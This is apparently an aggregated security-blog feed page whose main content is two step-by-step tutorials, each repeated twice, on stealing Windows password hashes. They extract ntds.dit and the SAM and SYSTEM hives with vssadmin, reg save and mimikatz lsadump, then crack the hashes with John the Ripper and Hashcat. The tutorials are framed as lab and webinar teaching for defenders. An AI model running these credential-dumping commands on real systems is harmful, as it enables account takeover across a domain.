Phishing: The Secret of Its Success and What You Can Do to Stop It
7 years 3 months ago
Learn about the tricks attackers use to dupe unsuspecting users and how you can help protect them—and your organization.
7 years 3 months ago
A CISO Landmine: No Security Awareness Training
7 years 3 months ago
CISOs who fail to prioritize security awareness training are putting their business and assets at serious risk.
November 2017 security update release
7 years 3 months ago
Today, we released security updates to provide additional protections against malicious attackers. By default, Windows 10 receives these updates automatically, and for customers running previous versions, we recommend they turn on automatic updates as a best practice.
More information about this month’s security updates can be found in the Security Update Guide.
November 2017 security update release
7 years 3 months ago
Today, we released security updates to provide additional protections against malicious attackers. By default, Windows 10 receives these updates automatically, and for customers running previous versions, we recommend they turn on automatic updates as a best practice.
More information about this month’s security updates can be found in the Security Update Guide.
7 years 3 months ago
Is a Good Offense the Best Defense Against Hackers?
7 years 4 months ago
Proposed legislation could change existing laws that bars victims of hacking attacks from striking back.
7 years 4 months ago
Cracking AD Passwords with NTDSXtract, and John the Ripper
7 years 4 months ago
Recently Thycotic sponsored a webinar titled "Kali Linux: Using John the Ripper, Hashcat and Other Tools to Steal Privileged Accounts". During the webinar Randy spoke about the tools and steps to crack Active Directory domain accounts. Here are the steps we used to do so.Creating a shadow copy of ntds.dit and the SYSTEM fileOn our domain controller we will steal the Ntds.dit file using VSSAdmin. First we need to open an elevated command prompt. Then we will create a copy using VSS. Run “vssadmin create shadow /for=C:”
Using the “Shadow Copy Volume Name:” we need to extract ntds.dit using “copy ShadowCopyVolumeNameHere\windows\ntds\ntds.dit c:\files” Note that you must use a valid target location for the copy. In the screenshot I used c:\Files and received an error because it does not exist. Using C:\junk, an existing directory, it worked.
We also need a copy of the SYSTEM file. You can easily retrieve this running “reg save hklm\system c:\junk”.
You should delete the shadow copy if you are done with it.
Copy your system file and ntds.dit from Windows to your Kali Linux box. Ignore pwd.txt since that is from other testing.
Extracting the data tables from ntds.dit using libesedb and esedbexportNow we need libesedb to extract the tables from the ntds.dit file. If you don’t already have this installed you can get it with the following commands: “git clone”
Now navigate to that directory using “cd libesedb/”
We must first install the other pre-req’s using “apt-get install git autoconf automake autopoint libtool pkg-config build-essential”
Run ./
Run ./
Run chmod +x configure
Run ./configure
Run make
Run sudo make install
Run ldconfig
Navigate to cd /usr/local/bin/
Export the tables from ntds.dit by running “esedbexport -m tables /root/ntds.dit”
Copy the /usr/local/bin/ntds.dit.export folder to /root/.
Extracting the AD user account hashes using NTDSXtractNext we have to download NTDSXtract by running this command wget
Unzip the file by running “unzip”.
Then navigate to the directory you’ve extracted it to and “cd”.
Now you must run the python script in that folder using the files you have created. The command is “python /root/ntds.dit.export/datatable.4 /root/ntds.dit.export/link_table.7 /root/hashdumpwork --syshive /root/system --passwordhashes --lmoutfile /root/lm-out.txt --ntoutfile /root/nt-out.txt --pwdformat ophc
You may have to substitute file paths if you have exported or moved the datatable files. The paths after lmoutfile and nt-outfile are output locations.
You will now have lm-out.txt and nt-out.txt files in your home directory.
Cracking the Hashes - Using JohnnyIn Kali under Password Attacks open Johnny.
Click Open password file and select the (PASSWD format) option.
Select the nt-out.txt from the earlier steps and click Open.
You should now see a list of user accounts and hashes displayed.
Click on the Start new attack button and you should get passwords returned in the Password column.
Note: There are various types of attack methods under Options and a vast amount of wordlists available online. Since this is our production environment and we use very complex passwords, we entered a few known passwords in to a custom wordlist dictionary file to expedite the cracking process.
Cracking the Hashes Using JohnIn Kali under Password Attacks open John
Run the following command: john --rules=all --format=nt.old --fork=2 nt-out.txt
As you can see in the screenshot below, John will start to crack user passwords. You can see that someone in our domain has been creating test accounts using the same password of abc123$$.
Cracking the Hashes Using HashcatIn Kali under Password Attacks open hashcat.
Run the following command: hashcat -m 1000 -a 0 nt-out.txt -o pwdhashcat.txt rockyou.txt --force --attack-mode 3
-m is our hash type-a 0 is our attack mode set to straight --attack-mode 3 was also used which is a brute-force attackNt-out.txt is our file from earlier steps that contains the userid’s and hashes-o is our output file which will be named pwdhashcat.txtRockyou.txt is our downloaded dictionary file. - This was downloaded off the web for this step.
Hashcat then began a brute force and dictionary attack. You will able to see it attempting to crack password after password after password in the terminal window.
This article was contributed by Barry Vista ([email protected])
Using the “Shadow Copy Volume Name:” we need to extract ntds.dit using “copy ShadowCopyVolumeNameHere\windows\ntds\ntds.dit c:\files” Note that you must use a valid target location for the copy. In the screenshot I used c:\Files and received an error because it does not exist. Using C:\junk, an existing directory, it worked.
We also need a copy of the SYSTEM file. You can easily retrieve this running “reg save hklm\system c:\junk”.
You should delete the shadow copy if you are done with it.
Copy your system file and ntds.dit from Windows to your Kali Linux box. Ignore pwd.txt since that is from other testing.
Extracting the data tables from ntds.dit using libesedb and esedbexportNow we need libesedb to extract the tables from the ntds.dit file. If you don’t already have this installed you can get it with the following commands: “git clone”
Now navigate to that directory using “cd libesedb/”
We must first install the other pre-req’s using “apt-get install git autoconf automake autopoint libtool pkg-config build-essential”
Run ./
Run ./
Run chmod +x configure
Run ./configure
Run make
Run sudo make install
Run ldconfig
Navigate to cd /usr/local/bin/
Export the tables from ntds.dit by running “esedbexport -m tables /root/ntds.dit”
Copy the /usr/local/bin/ntds.dit.export folder to /root/.
Extracting the AD user account hashes using NTDSXtractNext we have to download NTDSXtract by running this command wget
Unzip the file by running “unzip”.
Then navigate to the directory you’ve extracted it to and “cd”.
Now you must run the python script in that folder using the files you have created. The command is “python /root/ntds.dit.export/datatable.4 /root/ntds.dit.export/link_table.7 /root/hashdumpwork --syshive /root/system --passwordhashes --lmoutfile /root/lm-out.txt --ntoutfile /root/nt-out.txt --pwdformat ophc
You may have to substitute file paths if you have exported or moved the datatable files. The paths after lmoutfile and nt-outfile are output locations.
You will now have lm-out.txt and nt-out.txt files in your home directory.
Cracking the Hashes - Using JohnnyIn Kali under Password Attacks open Johnny.
Click Open password file and select the (PASSWD format) option.
Select the nt-out.txt from the earlier steps and click Open.
You should now see a list of user accounts and hashes displayed.
Click on the Start new attack button and you should get passwords returned in the Password column.
Note: There are various types of attack methods under Options and a vast amount of wordlists available online. Since this is our production environment and we use very complex passwords, we entered a few known passwords in to a custom wordlist dictionary file to expedite the cracking process.
Cracking the Hashes Using JohnIn Kali under Password Attacks open John
Run the following command: john --rules=all --format=nt.old --fork=2 nt-out.txt
As you can see in the screenshot below, John will start to crack user passwords. You can see that someone in our domain has been creating test accounts using the same password of abc123$$.
Cracking the Hashes Using HashcatIn Kali under Password Attacks open hashcat.
Run the following command: hashcat -m 1000 -a 0 nt-out.txt -o pwdhashcat.txt rockyou.txt --force --attack-mode 3
-m is our hash type-a 0 is our attack mode set to straight --attack-mode 3 was also used which is a brute-force attackNt-out.txt is our file from earlier steps that contains the userid’s and hashes-o is our output file which will be named pwdhashcat.txtRockyou.txt is our downloaded dictionary file. - This was downloaded off the web for this step.
Hashcat then began a brute force and dictionary attack. You will able to see it attempting to crack password after password after password in the terminal window.
This article was contributed by Barry Vista ([email protected])
Cracking local windows passwords with Mimikatz, LSA dump and Hashcat
7 years 4 months ago
Recently Thycotic sponsored a webinar titled "Kali Linux: Using John the Ripper, Hashcat and Other Tools to Steal Privileged Accounts". During the webinar Randy spoke about the tools and steps to crack local windows passwords. Here are the steps we used to do so.Extracting a copy of the SYSTEM and SAM registry hivesWe need to extract and copy the SYSTEM and SAM registry hives for the local machine. We do this by running “reg save hklm\sam” and “reg save hklm\security”.
Dumping the hashes with Mimikatz and LSAdumpNow we must use mimikatz to dump the hashes.
We need to run “lsadump::sam” from step 1 above. But as you can see in the screenshot below we get an error. This is because we do not have the proper access.
We must run at elevated privileges for the command to run successfully. We do this by running “privilege::debug” and then “token::elevate”.
Now run “log hash.txt” so that your next command will output to a txt file.
Now we can run the “lsadump::sam” from step 1 above successfully. It will display the username and hashes for all local users.
Navigate to the directory where mimikatz is located on your machine. In my instance it’s located in C:\Users\BarryVista\Downloads\mimikatz\x64. Here you will find the output in the hash.txt file.
We need to edit the contents of this file to display only the username and hash in this format – username:hash
Copy this file to your Kali Linux box home folder.
Cracking the hashes using HashcatRun hashcat with this command: hashcat -m 1000 -a 0 --force --show --username hash.txt wordlist1.lst
-m 1000 = hash type, in this case 1000 specifies a NTLM hash type
-a 0 = Straight attack mode
--force = ignore warnings
--show = compares hashlist with potfile; show cracked hashes
--username = enables ignoring of usernames in hashfile
hash.txt = our file with the username:hash information
wordlist1.lst = our word list with the passwords.
As you can see in the screenshot below we end up with the username, hash and password.
In this lab demo, we created a custom wordlist that contained our passwords with the exception of our real administrator password which is why it isn’t displayed. There are multiple sources on the web to download dictionary lists used for password cracking.
This article was contributed by Barry Vista ([email protected])
Dumping the hashes with Mimikatz and LSAdumpNow we must use mimikatz to dump the hashes.
We need to run “lsadump::sam” from step 1 above. But as you can see in the screenshot below we get an error. This is because we do not have the proper access.
We must run at elevated privileges for the command to run successfully. We do this by running “privilege::debug” and then “token::elevate”.
Now run “log hash.txt” so that your next command will output to a txt file.
Now we can run the “lsadump::sam” from step 1 above successfully. It will display the username and hashes for all local users.
Navigate to the directory where mimikatz is located on your machine. In my instance it’s located in C:\Users\BarryVista\Downloads\mimikatz\x64. Here you will find the output in the hash.txt file.
We need to edit the contents of this file to display only the username and hash in this format – username:hash
Copy this file to your Kali Linux box home folder.
Cracking the hashes using HashcatRun hashcat with this command: hashcat -m 1000 -a 0 --force --show --username hash.txt wordlist1.lst
-m 1000 = hash type, in this case 1000 specifies a NTLM hash type
-a 0 = Straight attack mode
--force = ignore warnings
--show = compares hashlist with potfile; show cracked hashes
--username = enables ignoring of usernames in hashfile
hash.txt = our file with the username:hash information
wordlist1.lst = our word list with the passwords.
As you can see in the screenshot below we end up with the username, hash and password.
In this lab demo, we created a custom wordlist that contained our passwords with the exception of our real administrator password which is why it isn’t displayed. There are multiple sources on the web to download dictionary lists used for password cracking.
This article was contributed by Barry Vista ([email protected])
What Happens to Encryption in a Post-Quantum Computing World?
7 years 4 months ago
As the possibility of quantum computing draws nearer, changes to today’s TLS key exchange algorithms will be required.
Assassin's Creed: Revelations on Xbox One -- Use Romanies/Mercenaries/Thieves on guard tips
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 8 - Nested Exceptions
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 9 - Access Test Variable
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 10 – CheckForDebugger
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 11 - Enter Critical Section
7 years 4 months ago
Mike Zhang
Dotfuscator & ClickOnce
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 12 - Test Calling Conventions
7 years 4 months ago
Mike Zhang
CrashMe analysis tutorial 13 - Invalid Handles
7 years 4 months ago
Mike Zhang